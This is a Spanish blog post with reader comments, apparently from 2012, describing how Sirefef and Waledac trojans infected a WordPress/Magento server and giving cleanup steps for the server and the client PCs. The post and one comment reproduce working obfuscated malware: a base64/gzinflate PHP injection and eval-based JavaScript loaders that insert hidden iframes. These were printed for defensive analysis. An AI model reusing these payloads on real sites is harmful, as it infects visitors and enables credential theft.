https://edprox.com/wp-content/uploads/2012/04/troyanos-sirefef-waledac.jpg

Troyanos sirefef y waledac – Como detectarlos y protegerse.

Lamentablemente durante los últimos días han surgido un nuevo tipo de troyanos que están infectando masivamente servidores de todo el mundo. Esta es la historia de mi encuentro con Sirefef y Waledac.

Un poco de historia

Hace poco recibí una llamada de una persona que tenia una pagina web de ventas y me indicaba que estaba perdiendo muchos clientes porque al entrar a su pagina les aparecía el antivirus con un mensaje de infección y publicidad en la pagina de la que no tenia control. Esto producía que muchos clientes le llamaran para quejarse y perdiera ventas. Esta persona estaba desesperada porque no sabia que hacer y la persona encargada de la pagina (webmaster) tampoco sabia que hacer.

El servidor estaba basado en la plataforma LAMP(Linux, Apache, MySQL y PHP) con los frameworks WordPress y Magento para gestionar la pagina y la tienda. Aparentemente, todos los síntomas indicaban que el servidor a sufrido un ataque XSS debido a una vulnerabilidad en el código. Todas las paginas tenían en la cabecera el siguiente código PHP:

Código PHP

#d93065#

echo(gzinflate(base64_decode(“tVVLc5swEP4t5WKoBxcJ9GCIemhOPffI+ODB4G
zGMS5Qe5JM/ntXK9mxE+xmOpMBMSvt6tuHvkU3fdXBdvhemTRmBZiYT6sCmnC76Pr65
2YIgySYBgwHx5EGkTFGp9HQPT7/aNt1vdiEURlsu3Zoh8dtHcxnv1+qxVDdhfWq3q/6ZfSMa
HvYLNv9bNlWfx7qzRA1ppzEKQM7pADJIdaQgExAMRA5KAUyB8lA4YoEfFKaSeC4rK18qlc
CuATNIMtAKGucahLIJoEYQbWFRgdohVNcYIA2KUo6hZgrOMTzGpPKXkFQTtCW5We2W
tjAbTTaBoECTsfwLiamcguN/uyMYsUck5EAYvJgV3LglIPMKHd8OTDU4uM9oE6B5lZ2TjIS
Sc1IJO9MAW22QNwiWh85+XbRZd5TjqVyalySrjyp9//WQlEqmvljcmqlKUVhv4JkqX3SaM
kcLrm1L1UHK41B2XDFoTyCpom1x7II58vVXvn6sSM9OGWIp0FIkrby4wLGxLkttBopNWrw
FEYP+2Qqua+kyM+ii/Vl+oxQQ1EyqLf7qA+4q/RFyghHGUb7KOvRpiDaj/CIucxwWXrO2lM
UBy5l/oyOJSWcI/VQzj6HfGdRnVJI/oM+x254w6D4GuIFajmsS+y6hnhKO4eir0dwoOS48Q
eP5bxbD4fju/E/AN/39xjmx39vn/fflkR/ThQiPLTBsDwNqH8Sm/xIG0/mZTKf9ds1DOEEJlG
xM0G9w+ttgWMdFC94Y+2i2rhbq9zNi71pit6U86Izv4YONquiabuwEFJ8MVDA1LDo+R6l3v
TTrgwaxOlwtA+3+L1bWPm2XeLtGO7L+/lXNs2SyLt5Mr29b5uoDp+i4uabv4//Ag==”)));

#/d93065#

Este código luego mostraba lo siguiente al cliente:

Código HTML/JavaScript

<NOscript>c=2;i=c-2;if(parseInt(“0123″)===83)if(window.document)try{new String
(“asd”).prototype.q}catch(egewgsd){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78
i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1
i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i
70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i6
7i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i64i69i73i78i64i70i76i8i13i62
i7i65i59i71i63i8i61i73i71i9i62i9i14i10i14i8i74i66i74i25i65i73i23i11i1i-6i81i67i62i7
8i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i7
7i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60
i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i5
9i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76
i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i7
8i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i6
3i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i64i69i73i78
i64i70i76i8i13i62i7i65i59i71i63i8i61i73i71i9i62i9i14i10i14i8i74i66i74i25i65i73i23
i11i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i
63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i
78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8
i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i
66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i
78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i7
1i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74
i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split(‘i’);md=’a';v=”eval”;}i
f(v)e=window[v];w=f;s=[];r=String;for(;591!=i;i+=1){j=i;s+=r["fromCharCode"](3
8+1*w[j]);}
if(f)z=s;e(z);</NOscript>

Después de ver el log de acceso por FTP, la infección se había producido con el usuario principal del cual solo tenia acceso el webmaster de la pagina. Después de analizar el equipo que el estaba utilizando, entendí lo que había pasado.

Este código se aprovecha de una vulnerabilidad en Internet Explorer 9.0.8112.16421, que ha dia de hoy aun no esta solucionada para infectar con un virus a la persona que visita la pagina. Una vez infectado el sistema, modifica el archivo HOSTS de Windows para redirigir el trafico de varias redes de publicidad (ADsense entre otras) y lo peor de todo, busca las contraseñas de acceso al servidor mediante FTP almacenadas en Filezilla. Lamentablemente Filezilla almacena la contraseñas en modo texto. Una vez el virus tiene las contraseñas del servidor , las utiliza para poder acceder e inyectar el código malicioso en la cabecera de todas las paginas que encuentre. Con esto, el circulo se cierra y vuelve a empezar el proceso, infectando a mas personas.

 

Solución y desinfección del servidor:

  1. Cambia las contraseñas FTP del servidor desde un equipo que no este infectado. Si no tienes acceso a un equipo desinfectado entonces es mejor que no cambies las contraseñas y desinfectes el equipo primero.
  2. Carga una copia de seguridad que no este infectada y con esto ya estaría solucionado el problema con el servidor. Si no tienes un copia de seguridad, continua con el paso 3.
  3. Si utilizas WordPress, debes ir a ..\wp-content\themes\NOMBRE_DEL_TEMA\header.php y buscar la linea de código php que indique anteriormente, borra la linea de código y guarda el código.
  4. Como método preventivo también utilizaría el plugin de WordPress llamado Antivirus para escanear todo el código y asegurarte de que esta todo limpio.

 

Solución y desinfección del cliente:

  1. Esta infección es muy reciente, por lo que muchos antivirus no la detectan, por suerte Security Essentials si que la detecta. Desinfecta el equipo con Microsoft Security Essentials, Sirefef y Waledac se suelen encontrar en C:\Users\USUARIO\AppData\Local\Temp\. Sirefef suele tener un nombre aleatorio con la extensión .dll y Waledac un nombre aleatorio con la extensión .tmp. Después de desinfectar el sistema debes escanear todo el sistema para descartar otras infecciones.
  2. El archivo HOSTS de Windows también estará infectado. Si lo intentas desinfectar manualmente te encontraras con que el archivo tiene unos permisos especiales (por culpa del virus) y no podrás editarlo. La solución mas fácil para desinfectarlo es utilizar la siguiente herramienta de microsoft.

 

Como conclusión, recomiendo no volver a usar Internet Explorer. Firefox y Chrome son alternativas mas seguras. Si tienes alguna duda, déjame un comentario.

Descargar: Rápido, Divertido y Genial

4 comments to Troyanos sirefef y waledac – Como detectarlos y protegerse.

  • 1 mayo, 2012

    Paul says:

    Hola, interesantes lineas las que comentas. Estoy viviendo una situación similar a lo que describes desde el pasado mes de Marzo 2012.

    He aplicado algunas de las soluciones que comentas pero no he tenido todo el exito que esperaba, quizás por interpretar que el alcance del compromiso en el servidor sería menor al igual que en mi máquina. Por ejemplo, se ha restauradao un backup de la web en el servidor a sabiendas de que esta limpio, se ha desinfectado el equipo con el que trabajo aplicando una reinstalación de sistema directamente, se han cambiado todas las passwords y para mi sorpresa, a finales de Abril 2012 me encuentro con un escenario similar.

    Algunos detalles que comentas los desconocía, por ejemplo la vulnerabilidad de IE9. Esto ha podido influir en volver a tener el mismo problema ya que trabajo indistintamente con IE9, firefox y Chrome. Dejaré de emplear IE9 una temporada hasta que se resuelve este problema o más, ya veremos. Otro detalle que desconocía es que FileZilla almacena en texto plano las contraseñas. No dejaremos pues a FileZilla que almacene las contraseñas. El caso es que empleo un método de comunicación cifrado vía SFTP pero claro, si la contraseña la tengo almacenada en texto plano en el equipo y éste se ve comprometido, ya tienes el lío montado. Desconocía que el archivo host se veía comprometido. Lo he creado de nuevo, pero aparentemente estaba limpio.

    En este momento estoy restaurando backups limpios de las webs en el servidor y analizando si mi equipo pudiese estár comprometido. Security essentials, Malwarebytes, SuperAntiSpyware y TDSSKiller me dicen que mi equipo no tiene compromiso, pero claro, siempre hay un lugar para las dudas.

    Ahora bien, tras restaurar los backups de las webs (todas con Joomla) actualizaremos todas (joomla y compomentes empleados) y, en caso de volver a tener un compromiso similar me preguntaría ¿que coñe hacemos ahora?

    En mi caso he detectado que se introducen numerosos archivos de javascript como por ejemplo “jquerytoogle.js” y nombres similares que contienen códigos como el que os muestro:

    c=3-1;i=-1-1+c;p=parseInt;if(p(“01″+”2″+”3″)===83)try{Number()["pr"+"ot"+"ot"+"ype"].q}
    catch(egewgsd){if(window.document)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k
    60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52
    k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k
    -28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k
    74k73k58k20k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k
    71k63k71k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k8
    0k67k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k74k64k75k64k7
    0k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k70k71k17k7k18k-2k21k19k6k64k6
    1k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73
    k56k68k60k73k-1k0k82k-28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k
    58k73k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k74k60k75k24
    k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74
    k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k
    64k67k64k75k80k20k-2k63k64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70
    k69k20k-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2k7k-2k18
    k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k
    -1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2
    k63k60k64k62k63k75k-2k3k-2k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k
    75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k5k
    56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84'][0].split(‘k’);
    v=”e”+”va”+”l”;}if(v)e=window[v];w=f;s=[];r=String;for(;567!=i;i+=1)
    {j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(s);

    Si alguien más tienen evidencias de algún compromiso similar que nos cuente su experiencia.

    • 1 mayo, 2012

      Webmaster says:

      ¿Que te aparece en el log de acceso por FTP? Sabiendo el usuario, los archivos que se modificaron y la fecha en la que ocurrió la modificación del código puede ayudarte a tener mas claro como se realizo la infección. También existe una extensión para Joomla llamada “PHP Anti-Hacker Suite by OSE” que te puede ayudar a prevenir o como mínimo detectar este tipo de modificaciones en el código.

  • 10 septiembre, 2012

    pavi says:

    hola, a mi me entró el virus de policia nacional, y ahora me detecta el malwarebites, un troyano sirefef .(cuando me han desbloqueado el pc del virus anterior)y se debe ejecutar cada vez que enciendo el pc, porque incluso oigo voces y musica de otras personas.Tengo windows 7,y uso el explorador mozilla firefox, me entro el virus cuando buscaba unas piezas en google, asi sin más.EStoy esperando a que me lo arreglen.La pregunta es, desaparecerá el virus si formateo el ordenador???? estoy un poco nervisa, por si puede regresar.

    • 1 octubre, 2012

      Webmaster says:

      Hola Pavi,

      Si formateas el ordenador, el virus va a desaparecer, ya que estas borrando todo lo que tienes en el disco duro, pero, esto no te garantiza que te vuelvas a infectar. Si tienes un Pen Drive (Memoria USB) infectado, si vuelves a visitar una web infectada entre muchas otras cosas, te volverás a infectar. La mejor opción para estar protegida es tener un buen antivirus, un navegador de confianza y un poco de desconfianza al navegar.

      Te recomiendo:
      -Usar Microsoft Security Essentials.
      -Navegar con Google Chrome.
      -Borrar la maquina virtual de Java de tu PC (Los agujeros de seguridad que están apareciendo últimamente son inaceptables y muchas infecciones entra por ahi).
      -En Microsoft Security Essentials activa la opción de escanear las unidades externas (Opciones > Avanzado > Marca la opción “Escanear unidades externas”)

      Si tienes cualquier otra preguntas no dudes en ponerte en contacto con nosotros.

Leave a Reply to pavi Cancel reply

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

*

Comments

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>